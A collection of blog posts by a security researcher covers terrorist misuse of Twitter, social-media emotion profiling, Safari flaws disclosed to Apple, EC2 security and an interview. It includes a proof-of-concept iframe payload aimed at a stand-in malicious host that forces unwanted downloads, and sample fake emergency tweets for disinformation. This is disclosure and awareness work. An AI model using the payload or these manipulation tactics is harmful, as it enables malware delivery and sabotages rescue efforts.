A recent US Army intelligence report identifies Twitter as a potential communication channel for terrorist activities. I think it is fantastic that intelligence efforts like this have the foresight to recognize emerging channels of communication and that there is effort being put into proactively enumerating the potential use cases. Yet, I am not impressed with the limited case studies presented in the report (the obvious case of Twitter being used for communication in addition to extremely specific situations of Twitter being utilized to trigger explosive devices). I feel that the use cases presented in this report are a good start, but they do not go beyond the obvious scenarios. Therefore, in this article, I want to further the discussion on how micro-blogging channels may be leveraged by terrorist organizations to obtain real time surveillance and intelligence of their efforts. I feel this sort of a conversation will be beneficial to counter-intelligence efforts (I will write a separate article on how Twitter may be actively leveraged by counter-intelligence).
Before I go any further, I want to get out of the way a probable knee-jerk reaction that I suspect some readers may have at this point. I am in no way proposing Twitter or social media as an evil (in fact I'm a huge fan of Twitter and I use it on a daily basis). That would be as absurd as saying that the Internet is evil because criminals can use it to communicate. Twitter is a channel of communication - my goal is to point out increased capabilities this channel may provide for criminal use.
I also want to point out that discussions like these are often
brushed off as fantastical. Perhaps this response comes from the
tendency to place too much weight on the (flawed) hypothesis that only
past and known mechanisms are going to (re)occur in the near future.
Consider 9/11: the incident would have been brushed off as fantastical
had someone had the foresight to predict the scenario prior. Often,
potential scenarios appear to be less probable not by rational
conclusions, but because to the human tendency to believe that only
past scenarios have the highest probability of occurrence. Nasim
Nicholas Taleb makes this point, in addition to stating that impactful
events are less predictable, in his his book The Black Swan: The Impact of the Highly Improbable - a must read for any security professional.
The heavily armed attackers who set out for Mumbai by sea last week navigated with Global Positioning System equipment, according to Indian investigators and police. They carried BlackBerrys, CDs holding high-resolution satellite images like those used for Google Earth maps, and multiple cellphones with switchable SIM cards that would be hard to track. They spoke by satellite telephone. And as television channels broadcast live coverage of the young men carrying out the terrorist attack, TV sets were turned on in the hotel rooms occupied by the gunmen, eyewitnesses recalled.
The authorities in India that responded to the attacks did not know about the Blackberries until after the fact. However, had the authorities known that the criminals possess Blackberries while the attacks were ongoing, they wouldn't have known how to leverage that knowledge. The point I'm trying to make here is that, in general, organizations that are responsible for researching and responding to incidents like these seem ill equipped because they do not know how to assess and leverage the increased utilization of information technology by criminals.
While the attacks in Bombay were ongoing, Twitter seemed to light up with conversations. From citizen journalists, to concerned individuals looking for relatives, to volunteers who attempted to orchestrate blood donations, there were approximately 80 new 'tweets' on the #Mumbai channel every five seconds!
It is clear how useful a micro-blogging channel like Twitter can be to the public during situations such as in the Bombay attacks. However, in the following list, I want to enumerate how potential terrorists may leverage a channel like Twitter to perform surveillance and mass manipulation, the sort of which were not possible prior to the micro-blogging medium. The list below is presented in the context of the recent attacks in Bombay but they can be applied for other situations as well. This is by no means an exhaustive list, but I think it is enough to get the conversation going.
Circumventing rescue efforts. Twitter was used by
citizens in vicinity of Bombay to call upon the public for blood
donations. Here is an actual Twitter message sent during while the
attacks were ongoing:
It is clear that Twitter messages can assist in rescue efforts, and in this case, they played a positive role in broadcasting details on where volunteers may help out by donating blood.
Now, consider a situation where a malicious party were to sign up for multiple Twitter accounts and Tweet messages similar to the one presented in this use-case but using non-existent phone numbers:
JJ hospital needs A-blood urgently. Please call Ashwin at 92331003351 #mumbai
JJ hospital needs A-blood urgently. Please call Ashwin at 92331003352 #mumbai
JJ hospital needs A-blood urgently. Please call Ashwin at 92331003353 #mumbai
JJ hospital needs A-blood urgently. Please call Ashwin at 92331003354 #mumbai
JJ hospital needs A-blood urgently. Please call Ashwin at 92331003356 #mumbai
The potential for abuse in this case relies upon the fact that, during emergency situations, people are likely to accept and re-broadcast messages without verification. The malicious Twitter messages above, with incorrect phone numbers, are just as likely to be re-tweeted. People who are able and want to donate blood will now no longer be able to effectively utilize the micro-blogging channel to contact the proper resources.
Group sentiment analysis. The genuine nature of micro-blogging channels makes them a powerful channel to capture genuine human feelings. In my previous article, Hacking the Psyche, I presented how individual feelings from the social web, including Twitter, can be captured to create an emotion dashboard depicting the past and current states of feelings.
Since the goal of terror attacks is to cause terror - sentiment analysis can be a powerful tool for the terror agents to measure the impact of their attacks. A mashup of an automated sentiment analysis engine using the Twitter API coupled with the Google Maps API can easily give the agents a clear visual of how their terror attacks are impacting the emotional states of individuals in particular locations, for example, are people in target location location x upset / scared / worried / angry / happy in response to the ongoing or recently committed attack? What locations around the world have reacted negatively or positively to the attacks?
Following the news media. This is most likely to be one of the more obvious use cases. As mentioned earlier, the terrorists in the Bombay attacks were found to have used Blackberries to keep up with news websites to measure the impact of their ongoing efforts. Instead of having to surf to multiple news media websites, it is plausible that criminals can utilize traffic in the particular channel of interest, for example #Mumbai, to find pointers (URLs) to high quality reports pre-filtered by the Twitter community. The following is a screenshot of Twitter messages in the #Mumbai channel:
Leveraging and manipulating citizen journalists.
Individuals in the vicinity of the ongoing attacks in Bombay were
providing first hand reporting of police efforts. This information is
likely to be extremely useful to the criminals.
Furthermore, individuals on the scene may be remotely manipulated to provide specific information that a criminal may be seeking, for example, the following message could be posed to the #Mumbai channel by a malicious entity seeking further details: "Can anyone on-site please confirm the number of choppers above Nariman house asap?"
Data poisoning police efforts. In a future article, I will attempt to enumerate ideas on how police may be able to utilize social media, one of the uses cases being the ability to leverage information from citizen journalists to strategize counter-efforts. A malicious response to this is likely to take the form of data poisoning, where the malicious party may post false information onto the micro-blogging channels while posing as citizen journalists.
Geo-locating and instigating further panic. One of the goals of terrorism is to instigate panic. Many Twitter clients, specially those that run on mobile platforms, allow users to tag their specific geo-location. These information can be queried and coupled with sentiment analysis discussed above to measure the level of panic based on geographical locations.
Further panic and unrest may be instigated by spreading false
rumors. From the malicious party's perspective, it is a lot cheaper to
create panic from spreading rumors than having to carry out physical
activities. To illustrate, here is an example of messages that
overwhelmed the #Mumbai
channel by a single Twitter message from someone suggesting that the
terrorists may be reading the information being posted. It was unlikely
that the terrorists in the Mumbai incidents were reading Twitter, but
the point I'm trying to make here is how fast such a rumor can
So what does all of this mean? The goal of this article is to spread awareness and raise consciousness. The ideas presented in this article may appear far fetched at the moment, but with the explosive growth and integration of social applications into the lives of the Generation Y culture, it is increasingly probable that malicious parties are likely to leverage social media channels as time progresses. I feel it is important that we have a good grasp of how criminals may utilize these channels so we better understand the tactics of enemies we are likely to deal with in the future.
Perhaps it may also be useful to extend this thought process to criminal use of social media in terms of cyber-warfare. Many people expect cyber-warfare tactics to be limited to defects in the network and application layers, yet it is increasingly plausible that government sponsored crime may take upon use cases that leverage social applications. I have discussed the abuse of sentiment analysis in my Hacking the Psyche article that illustrates one such example. If you are interested in this topic and if you are in New York during January 6 - 8, I will be speaking at the 2009 International Conference on Cyber Security.
In a previous article, Hacking the Psyche, I presented the security and privacy implications of capturing feelings of individuals using on-line mechanisms for good use as well as abuse and manipulation. Whenever controls around individual privacy are called into question, there is always, on the other side of the coin, a clear business opportunity.
Corporations often use indirect data such as demographic information and sales statistics to measure the health of their brand because the direct data, i.e how the public and their customers actually feel about their brand, is not available for capture. In this article, I want put forth a case study to demonstrate how capturing feelings on the social web can allow companies to measure the reputation of their brand.
In September 2008, Microsoft reportedly paid Jerry Seinfeld $10 Million dollars to star in it's recent TV commercial campaign. In this article I want to provide evidence to facilitate the hypothesis that Microsoft, in addition to paying Seinfeld, suffered the additional cost of damage to its brand from the commercials. On a positive note, the I'm a PC commercial that followed seems to have up for the damage.
Here are the TV advertisements:
September 4, 2008: Shoe Circus [starring Jerry Seinfeld and Bill Gates]
September 11, 2008: New Family [starring Jerry Seinfeld and Bill Gates]
September 18, 2008: I'm a PC [not starring Jerry Seinfeld]
Now, lets turn to Twitter to measure the feelings expressed towards these commercials during the month of September 2008. Using the Emotion Dashboard tool I presented in Hacking the Psyche, I was able to visualize how people on Twitter felt about these commercials. Here's a video of the tool in action:
There you have it: a powerful method to use feelings expressed in social media to measure a corporation's brand and marketing efforts.
Brand reconnaissance is not the only effort that can be leveraged from feelings on the social web. If you are interested in this topic, I invite you to consider my upcoming talk the O'Reilly Money Tech Conference titled Emotion Dashboard: Harvesting Feelings on the Social Web for Powerful Decisioning.
Tim O'Reilly recently blogged about why he supports Barack Obama. Following this, in a more recent blog entry, Tim addresses some complaints from readers who dismissed his endorsement of Obama as out of line for a technical site such as O'Reilly.
I think Tim did the right thing in putting up the blog entry about his endorsement for Obama. Even though Tim himself may see some justice in one reader's displeasure about the blog entry showing up in the News section - I don't see a problem with it. Tim is a well known technologist - his endorsement and, most importantly, his reasoning behind his endorsement is news to me and I want to read it.
I feel, as technologists and scientists, we have the right and the duty to take upon critical thought and express opinions on topics that are important to the world and to society; the job of information technology is a lot more than just discussing software and hardware for the sake of discussing software and hardware.
My enthusiasm for technology ultimately derives from my appreciation for the most well known method of evaluating and finding out what is true in the universe: Science. Therefore, I want to extend this issue beyond the O'Reilly case to point out two topics that are often labeled taboo and consequently banned from discussion on many intellectual forums and venues: politics and religion.
I feel the science community at large has played along with the taboo of approaching the matters of politics and religion with kid gloves for far too long. These are important topics that affect our lives today and the lives of future generations.
Venues such as O'Reilly are not likely to discuss politics or religion often. Yet, as scientists and technologists, when we do have something to say that addresses an important topic where we can offer reasoning and critical thought - lets not be shy about it. The illogical, taboo-based, and oft-counter-claim, mostly along the lines of "You are not supposed to talk about x? Why not? Because you are not" is dangerous because it shuts away Science from contributing much needed critical thought and reasoning to important topics that shape our world.
In this article, I want to persuade you of the real possibility and high probability that, in the very near future, remote entities will be able target people’s on-line presence to capture and leverage their emotional states and feelings. There are some very extreme implications of this from a security and privacy perspective, and this is the scope I will adhere to in this article. On the flip side, the ideas presented in this article can be leveraged to construct powerful business decisioning and measurement capabilities, a topic that deserves it’s own space - I will cover this subject in a separate article in the next few days.
Before I go any further, I want to stress that the purpose of this article is not to spread undue alarm, nor is the purpose to portray social online media as an evil. I personally utilize the many avenues of online communication and collaboration facilitated by the Generation Y culture. The purpose of this article, instead, is to share some of my initial thoughts on the possibilities of abuse, specific to the mapping of individual feelings online and possible implications.
We Feel Fine.
To begin with, I insist that you watch Jonathan Harris’ TED talk titled The Art of Collecting Stories:
In this talk, Jonathan describes his passion for making sense of the emotional world and his deep compassion for the human condition. Regardless of this particular article, Jonathan’s talk stands on it’s own. I think Jonathan’s ideas, projects, and aspirations are true works of art. His ideas are powerful enough to inspire a security professional such as me to look outside the oft-incestual world of information security, and to reach out and connect with other venues of Science and understanding. In a small way, the material presented in this article are my attempts to try and do just that.
I invite you to visit one of Jonathan’s projects that he co-founded with Sep Kamvar - We Feel Fine :
Since August 2005, We Feel Fine has been harvesting human feelings from a large number of weblogs. Every few minutes, the system searches the world's newly posted blog entries for occurrences of the phrases "I feel" and "I am feeling". When it finds such a phrase, it records the full sentence, up to the period, and identifies the "feeling" expressed in that sentence (e.g. sad, happy, depressed, etc.). Because blogs are structured in largely standard ways, the age, gender, and geographical location of the author can often be extracted and saved along with the sentence, as can the local weather conditions at the time the sentence was written. All of this information is saved.
The result is a database of several million human feelings, increasing by 15,000 - 20,000 new feelings per day. Using a series of playful interfaces, the feelings can be searched and sorted across a number of demographic slices, offering responses to specific questions like: do Europeans feel sad more often than Americans? Do women feel fat more often than men? Does rainy weather affect how we feel? What are the most representative feelings of female New Yorkers in their 20s? What do people feel right now in Baghdad? What were people feeling on Valentine's Day? Which are the happiest cities in the world? The saddest? And so on.
At its core, We Feel Fine is an artwork authored by everyone. It will grow and change as we grow and change, reflecting what's on our blogs, what's in our hearts, what's in our minds. We hope it makes the world seem a little smaller, and we hope it helps people see beauty in the everyday ups and downs of life.
Here is a video I uploaded to Youtube, demonstrating We Feel Fine’s interface, including the ability filter for specific targets (for example: feelings expressed by individuals in their 20s in Iraq):
Emotion Dashboard: Targeting Individuals.
The We Feel Fine project does not target specific individuals. The creators of the project imply that doing so would violate an individual's privacy:
Privacy: We Feel Fine only collects and displays data that was already posted publicly on the World Wide Web? We Feel Fine never associates individual human names with the feelings it displays, though it always provides a link to the blog from which any displayed sentence or picture was collected....
We Feel Fine is a work of art designed by well meaning intellectuals. It doesn’t have the capability nor the intention of intruding on any one particular person’s privacy, yet the project raised my personal consciousness towards the security and privacy implications of capturing the feelings (past and present) of individuals.
To pursue discussion around the possibility and implications of capturing feelings projected by individuals online, I decided to develop a proof of concept visualization tool that I will call Emotion Dashboard. This is not a production-ready tool of any sort because I do not currently have the resources to develop such a thing. The goal of this tool (if you should even call it a tool) is to demonstrate my ideas and my vision on this particular topic to facilitate and encourage further discussion in the community. Here are the components of Emotion Dashboard:
In other words, the targeted individual’s online presence may include his or her Facebook profile updates, Blogs, and Twitter messages. In this way, updates on all of the sources of a particular individual’s online presence can be coupled together in one RSS feed and then supplied to Emotion Dashboard which will scan the feed from the past to the present (older entries first).
Immediately below the line graph is a solid bar that expresses the culmination of the individual’s overall mood. The color of this bar is either Yellow (happy), Blue (sad), or Red (angry). The hex code for these colors are also derived from the We Feel Fine CSV file listed above.
I concede that this technique of merely grepping for words lacks context and that is prone to an extremely high error rate. However, given the limited amount of resources I have at this point, my goal is not to provide something that readily usable for all cases, but to present a starting point of a possible approach and the probable implications should this be extended to apply intelligent grammar based contextual analysis. Do note that, even though I concede this is an approach vulnerable to a high error rate, the technique does, statistically speaking, get slightly more accurate the more words it consumes.
The word cloud allows the user to analyze the words being used to express feelings as the Emotion Dashboard reads the RSS feed from past to present. The words in the cloud are colored based on the associated hex color codes present in the CSV file.
The following is a screen-shot demonstrates a sample output of an individual’s (who we will call “Jack Smith” for the purposes of this discussion) online presence:
Here are some observations and implications:
Once enough information about Jack is collected to reasonably satisfy the personality test requirements, Jack’s personality patterns can be determined that may aid a malicious third party in exploiting Jack’s current emotional state. It is also plausible that this an be extended to automated and trigger based abilities. This is an extremely powerful idea - Jack may not be consciously aware of his negative mood, yet a third party may be able to analyze this remotely with some degree of probability. The following is a screen-shot of the results of a Big 5-like personality test (courtesy of Signal Patterns) :
Case Study: Criminal Investigation and Analysis.
There are numerous security and privacy implications of the discussion at hand. I am unlikely to succeed in attempting to iterate them all. Instead, I want to present one particular case study that can further illustrate the impact of this topic.
In this case study, I want to take upon the following real incident: http://blog.mlive.com/chronicle/2008/07/excon_vents_pain_online_then_k.html
Ex-con vents pain online, then kills
OCEANA COUNTY -- Danlee Mead was apparently using his MySpace site to tell the world how unhappy and desperate he felt in the hours before he abducted and killed his wife, then turned a shotgun on himself.... Hours later, the depth of the ex-convict's anguish turned to violence.....
A cached copy of Danlee’s MySpace page suggests that he changed his profile (moments before he committed the violent act) to use more positive-sounding words, even though his overall thoughts remained negative. His prior profile, also consisted of negative feelings, yet the words used in the original profile were more negative-sounding. Here is a demonstration of what his profile looks like when run through an analysis over time:
A few observations:
Following from the above observations, it is clear to see how this type of analysis can be used by investigators, admittedly after-the-fact, to get a glimpse into a suspect's state of mind over time.
It may not be possible to use data from online social media to proactively detect the future behavior of all individuals, yet in this situation, the criminal did indeed have prior history of crimes. Perhaps a proactive approach targeted towards known suspects’ online social presence can be used to detect certain deviance form tuned thresholds - possibly in an automatic fashion based on a set of defined triggers. Such an approach seems more tolerable for a set of individuals with known backgrounds because the elements in their history can aid in influencing the signal-to-noise ratio in favor of the signal.
Some Additional Thoughts.
The prior case study was just one illustration of the many impacts of using social media to capture the psyche of individuals. Here are some additional thoughts:
To conclude, I sincerely hope this article facilitates further discussion around the topics presented. You may feel that the probability of fruition of some of my thoughts and ideas is low. Perhaps you may find them extremely fantastical, or perhaps you agree that the scenarios presented indeed have a high probability of being relevant in the near future. I am obviously intrigued by the topic and I’d be delighted to hear your thoughts.
During the next few months, I will be presenting a brand-new talk titled "Suddenly Psychic: Knowing Everything About Everyone" at various conferences around the world. I will be presenting it with Akshay Aggarwal, a good friend of mine. Akshay and I have enjoyed researching the business, security, criminal, social, and psychological implications of this topic, and we look forward to sharing our research with you.
Currently, this talk is scheduled debut at the Microsoft Blue Hat Conference [v8] in October, followed by Hack in the Box in Kuala Lumpur.
TITLE: Suddenly Psychic: Knowing Everything About Everyone
Imagine a world where you can remotely influence other people's behavior. This talk will expose how information about people in the physical world, coupled with voluntary information from new communication paradigms such as social networking applications, can enable you to remotely read people's minds to influence their behavior.
Topics of discussion will include:
The goal of this presentation is to raise consciousness on how the new paradigms of social communication bring with it real risks as well as marketing and economic advantages. Perspectives on negative and positive uses will be presented in addition to academic discussions and thoughts on how to enable the upcoming online social age.
I presented "Bad Sushi: Beating Phishers at their Own Game" with Billy at the Microsoft Blue Hat 2008 conference. It was a great opportunity to get to know the Microsoft security and product teams. I'd like to thank Billy Rios, Andrew Cushman, Katie Moussouris, Sarah Blankinship, Celene Temkin, Dana Hehl, and the rest of the Blue Hat team for inviting me.
Speaking of Microsoft, I'm moving to Seattle tomorrow. I'm looking forward to getting in touch with a lot of old friends there so that should be good. If you are in the area, just let me know - it will be good to catch up.
I recently communicated 3 security issues in the Safari browser to Apple.
Apple let me know that they will fix 1 of the issues I reported. I will not discuss the vulnerability Apple has promised to fix until they release the fix because it is a high risk issue affecting Safari on OSX and Windows.
I let Apple know that I'd like to discuss the 2 issues they won't be fixing with the security community and they let me know they are fine with it. A quote from my last email to Apple:
...since you do not consider issue 1 and 2 to be security related, I will feel free to discuss my thoughts within the information security community. Just let me know if you would like me to wait for some amount of time before I do this.
Response from Apple: We understand if you want to discuss these in the security community.
Before I get to the details, I want to make it extremely clear that the Apple security team has been a pleasure to communicate with. I sent them a couple of emails asking for clarifications, and they responded quickly and courteously every time. I want to publicly acknowledge that I appreciate this very much.
Here are the issues I reported:
1. Safari Carpet Bomb. It is possible for a rogue website to litter the user's Desktop (Windows) or Downloads directory (~/Downloads/ in OSX). This can happen because the Safari browser cannot be configured to obtain the user's permission before it downloads a resource. Safari downloads the resource without the user's consent and places it in a default location (unless changed).
Assume you visit a malicious site,
http://malicious.example.com/, that serves the following HTML:
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
Now assume that
http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following:
print "Content-type: blah/blah\n\n"
Since Safari does not know how to render
blah/blah, it will automatically start downloading
carpet_bomb.cgi every time it is served. If you are using Safari in Windows, this is what will happen to your desktop once you visit http://malicious.example.com/ :
The implication of this is obvious: Malware downloaded to the user's desktop without the user's consent.
Apple does not feel this is a issue they want to tackle at this time. In my most recent email to Apple, I suggested that they incorporate an option in Safari so the browser can be configured to ask the user before anything is downloaded to the local file system. Apple agreed it was a good suggestion:
...the ability to have a preference to "Ask me before downloading anything" is a good suggestion. We can file that as an enhancement request for the Safari team. Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads. This will require a review with the Human Interface team. We want to set your expectations that this could take quite a while, if it ever gets incorporated.
[credit to BK have-it-your-way Rios for suggesting the term "Carpet Bomb" to describe this issue].
2. Sandbox not Applied to Local Resources. This issue is more of a feature set request than a vulnerability. For example, Internet Explorer warns users when a local resource such as an HTML file attempts to invoke client side scripting. I feel this is an important security feature because of user expectations: even the most sophisticated users differentiate between the risk of clicking on an executable they have downloaded (risk perceived to be higher) to clicking on a HTML file they have downloaded (risk perceived to be lower).
Apple's response was positive:
...we have been investigating the potential for a "safe" mode for local HTML. This is an area that requires a fairly deep investigation to address compatibility issues, and to determine the proper operation. Please understand that when we label this as a security hardening measure, we are not discounting the benefits that this could have.
3. [Undisclosed]. The third issue I reported to Apple is a high risk vulnerability in Safari that can be used to remotely steal local files from the user's file system. Apple responded positively and let me know that they are actively working to resolve the issue and issue a patch. I will post an update if I hear back from them.
I'd like to thank the Apple security team for their timely responses and for letting me discuss these issues with the security community.
The Cloud Computing buzz is everywhere. The concept of grid computing on the Internet to provide elasticity and virtualization of resources is quite appealing, and hence there has been a lot of academic brain-storming going on recently that has given rise to abstract ideas on how cloud computing is destined to change the way technology resources are deployed and used.
Until now, small developers did not have the capital to acquire massive compute resources and insure they had the capacity they needed to handle unexpected spikes in load. Amazon EC2 enables any developer to leverage Amazon's own benefits of massive scale with no up-front investment or performance compromises. Developers are now free to innovate knowing that no matter how successful their businesses become, it will be inexpensive and simple to ensure they have the compute capacity they need to meet their business requirements.
The "Elastic" nature of the service allows developers to instantly scale to meet spikes in traffic or demand. When computing requirements unexpectedly change (up or down), Amazon EC2 can instantly respond, meaning that developers have the ability to control how many resources are in use at any given point in time. In contrast, traditional hosting services generally provide a fixed number of resources for a fixed amount of time, meaning that users have a limited ability to easily respond when their usage is rapidly changing, unpredictable, or is known to experience large peaks at various intervals.
I was able to go through the Getting Started Guide and I had myself a Linux environment in the Amazon cloud in no time:
Amazon EC2 presents a true virtual computing environment, allowing you to use web service interfaces to requisition machines for use, load them with your custom application environment, manage your network's access permissions, and run your image using as many or few systems as you desire.
To use Amazon EC2, you simply:
* Create an Amazon Machine Image (AMI) containing your applications, libraries, data and associated configuration settings. Or use pre-configured, templated images to get up and running immediately.
* Upload the AMI into Amazon S3. Amazon EC2 provides tools that make storing the AMI simple. Amazon S3 provides a safe, reliable and fast repository to store your images.
* Use Amazon EC2 web service to configure security and network access.
* Start, terminate, and monitor as many instances of your AMI as needed, using the web service APIs.
* Pay only for the resources that you actually consume, like instance-hours or data transfer.
Based on my recent experience, here are some initial thoughts (with bias on security):
To add your AMI:
1. Make sure you're logged in to the site.
2. Click the "Add a Document" link in the Tools box to the right.
3. Enter as much information as possible in the form, then click Preview. (Tip: You can use HTML in the listing body.)
4. If everything looks good, click Submit. Otherwise, click "Go Back/Edit" and make your corrections.
Important: Your listing will show up on the site after a quick review by AWS.
Interesting. I wonder what the "quick review" entails. What if someone submits an AMI with a back-door installed? Does the Amazon team have the resources and processes to identify malicious AMIs before sharing them with their customers?
Keys to the Cloud. The Amazon services are based upon a key-based approach (you get your own key-pair to authenticate to Amazon and to sign your own AMIs) - this is good. There is the burden of key management, but it is still a better approach than implementing a static password based system.
Firewall. Instances initially boot in a firewalled environment where you have to explicitly open up ports to allow inbound access. This is a good approach as well.
Dude, Where's My Data? Data in the virtual instance only persists as long as the instance is running. From Amazon's FAQ:
Q: What happens to my data when a system terminates?
The data stored on a specific instance persists only as long as that instance is alive. You have several options to persist your data:
1. Prior to terminating an instance, backup the data to persistent storage, either over the Internet, or to Amazon S3.
2. Run a redundant set of systems with replication of the data between them.
We recommend you should not rely on a single instance to provide reliability for your data.
This means that existing applications and systems need to be re-engineered to persist data in the cloud (outside of the virtual environment). Makes sense, in order to take advantage of the elasticity of cloud computing, your data has got to be 'in the cloud' and not tied to a single virtual instance. This may have some legal implications, and it may make some organizations (initially) uncomfortable to come to terms with the idea that their live data does not persist on their own hardware.
I'm afraid we are likely to see cases of security issues arising from badly re-engineered application code as developers attempt to code their applications to persist data using services like S3 instead of local data stores.
Risk Based on Data. Most often, organizations fail to risk inventory their assets based on the type of data the system reads and writes. The cloud computing paradigm will force organizations to think of data foremost when building a risk inventory. This is a good thing.
Security Principles. Obvious and well known security principles apply to cloud based services like EC2. You've got to ensure that your VMs are configured securely, that your applications are developed securely, and that you communicate securely - think about authentication, authorization, access control, cryptography, and monitoring on all layers and tiers of the system.
The Threat of Mono-culture. I'm reminded of Dan Geer's words on the threat of mono-culture. If you start up hundreds of instances of a virtual image, a vulnerability in one instance will apply to all other instances of the same image. Imagine a situation where a remotely exploitable vulnerability is found in the generic kick start image Amazon recommends to its customers - suddenly, the security of a considerable amount of resources and data within the cloud will be at stake.
Cloud Insecurity. Security issues within the Amazon web services will have an extremely high impact on EC2 customers. For example, suppose a malicious user is able to invoke the services behind ec2-terminate-instances to terminate instances outside of his or her role. Such a vulnerability could be abused to black-out the Amazon cloud.
Perimeter? What Perimeter? The concept of relying on a network based parameter has been losing steady ground. Cloud computing services like EC2 will be a catalyst to this recommendation - data and resources will be distributed in a shared cloud space. The concept of network based perimeter will no longer apply. Instead, security controls will need to be assured on all layers and tiers of the architecture. However, there are bound to be cases where organizations will try to build trust within the cloud to construct a virtual perimeter to imitate legacy designs.
Service Provider Liability. As the concept of cloud computing gains ground, it is likely that the service providers will seek to implement technical solutions that will allow them to provide resources in the cloud without the legal liability of hosting and computing secret or illegal data. For example, a consumer or legal requirement may warrant the customer of the cloud to have the ability to compute or store data in the cloud without exposing the computation result or data to the provider. This may facilitate tangible products to arise from academic concepts of zero knowledge based solutions.
Single Point of Failure. Amazon provides the concept of Zones and Regions (currently limited to 1 region):
Amazon EC2 now provides the ability to place instances in multiple locations. Amazon EC2 locations are composed of regions and availability zones. Regions are geographically dispersed and will be in separate geographic areas or countries. Currently, Amazon EC2 exposes only a single region. Availability zones are distinct locations that are engineered to be insulated from failures in other availability zones and provide inexpensive, low latency network connectivity to other availability zones in the same region. Regions consist of one or more availability zones. By launching instances in separate availability zones, you can protect your applications from failure of a single location.
This is good - Amazon allows for instances to be booted in different zones to prevent impact from the failure of a particular location. But what about Amazon as a whole as the single point of failure? The concept of resources being distributed geographically makes this scenario less probable. As cloud offerings from other companies emerge, it may make sense for larger organizations to host on other cloud service offerings to further decrease the single point of failure scenario. Doing so could be a little difficult since competing services may require adherence to specific programming languages and environments. For example, the Google App Engine SDK is currently limited to Python and is not based on the concept of allowing users to configure full blown virtual environments. Perhaps I'll write my thoughts on the Google App Engine in the near future.
I'm excited about the concept of cloud based computing. It's the future, and Amazon has done a good job of turning the hype into reality. I'll be interested to see how Google's offerings mature, and what Microsoft and IBM have up their sleeves.
These are just my initial thoughts on security implications of the emerging cloud computing paradigm. I'll continue to post updates as I have time to think about it some more. If you'd like to share some ideas, I'd be interested to hear them.
Issue 16 of [IN]Secure Magazine is available. Mirko Zorz interviewed me in this edition (Page 41). If you decide to read it, I'd be delighted to hear your thoughts and feedback. The magazine edition of the interview is much better looking and highly recommended (as are the other articles), but for the sake of convenience, the interview session is below.
Enterprises need to formulate high-level goals for application security efforts before implementing specific service lines. What are the key areas they have to cover in order to make their endeavor successful?
I agree. You've got to strategize high-level goals before deciding on specifics. Most businesses are not in the business of being secure. They are in the business of generating revenue, protecting their brand, and their intellectual property. Application security goals must derive from and support these business goals to promise risk reduction across the enterprise cheaply and effectively. Such promises in turn require specific implementations and processes such as hiring the right talent, laying the right framework, hooking security into the development lifecycles, training, metrics, and executive support.
Despite owning a plethora of software and hardware solutions, the critical asset to an organization is still the security professional who works with those acquisitions. How exactly important is the security team?
Talent is key. What good is an application scanner or code analyzer if you don't have professionals in your team who actually understand the results? The fastest way to lose credibility with the business is to employ individuals who cannot go beyond running assessment tools and exporting reports. The job of a security team in any organization is not to hire people who can point and click their way into running assessment tools, but to establish a world-class effort that serves the needs of the business. You do that by hiring subject matter experts. You do that by hiring talent that can impress the business and demonstrate tangible value and progress.
With the threat landscape constantly evolving and old issues still not resolved, the organization has to battle problems such as a lack of security awareness that bring in a myriad of complications. What is the right approach to take in order to battle difficulties one can't completely protect against?
That's a two-part question: how to deal with known issues, and how to keep up with the latest attack vectors. First, you've got to establish a process that aims to remove security gaps at the root. Training and awareness offers the best ROI in this regard: bugs that don't get created in the first place - imagine that! It is also vital to embed security into the development lifecycles of applications. However many organizations have trouble deciding where to begin. The solution is to assign efforts based on risk. Start by understanding what applications you own and what their business impact is. What type of data do these applications read and write? What is the business criticality of these applications? Once you have a good understanding of your application portfolio, it will be much easier to assign effort so you can focus clearly.
As for the second part of the question, the solution is to invest effort into research and development so you continue to understand how the latest attack vectors may target your software. Yet again, training and awareness wins in this regard. Set aside a budget to send your team to information security conferences and training programs so they can soak up new knowledge. Allow analysts to take some time out to investigate the latest attack techniques. Most hands on security professionals are scientists at heart - understand what makes them thrive and support their talent. Support their desire to learn new ways to break security controls. Finally, capture and communicate this knowledge to the business. For example, ensure your threat modeling attack libraries are up to date and reflect the latest attack vectors, that your code review and assessment methodologies are bleeding edge, and that you take time out to brief the architects and developers on what they need to know to keep up.
Although applications have the largest attack vector today, CSOs don't take this into account when strategizing security spending. What kind of issues can this bring in the near future?
I overwhelmingly agree - the security spend of many organizations is out of whack with the real threat landscape. I feel there are multiple reasons behind this situation, the most common reason being, in my personal opinion, that many individuals who have been hands on in the past remember and hold on to the notion of the network layer being the only big thing to worry about. I can sympathize with that view - if you rewind a couple of years, majority of the high impact attacks could be identified and blocked via network controls because the attack surface of applications was low compared to today's scenario where a typical enterprise level web application is comprised of millions of lines of custom code. Perhaps another reasoning for this situation is that solutions around application security do not provide the instant gratification of throwing in a few appliances to solve problems. Well, perhaps, I should take that back, there are a few web application firewall solutions in the form of appliances that are starting to be marketed that way, but that's the nature of marketing and I'll save my rant for another forum. Also, quite unfortunately, there are going to be more situations in the coming future where many security efforts will align with reality after learning the hard way - i.e. after an application related exposure has already taken place. That said, the onus is still on the security professionals and researchers - we need to do an even better job of demonstrating impact and educating decision makers on why a solid application security strategy is vital to any organization's overall security effort.
While having consultants come in and perform black box penetration audits of applications every year is more costly than investing in a solid SDLC process, many organizations still believe it to be the proper strategy. What should they take into consideration when making this decision?
Black-box penetration tests are useful, yet they are extremely expensive and ineffective when relied upon as an exclusive solution. Paraphrasing a colleague of mine, "Companies that solely on black-box assessments to guide their security efforts do something similar to having consultants come in, throw a grenade at them, and have the consultants close the door on their way out". Gary McGraw likens this situation to what he calls a "Badnessometer". Black-box assessments correlate to symptoms that reflect the level of trouble you may be in. The response shouldn't be to just fix the black-box assessment results, but to respond to the situation strategically, and ensure you are responding to and eliminating the root cause of your problems to make sure they do not re-occur.
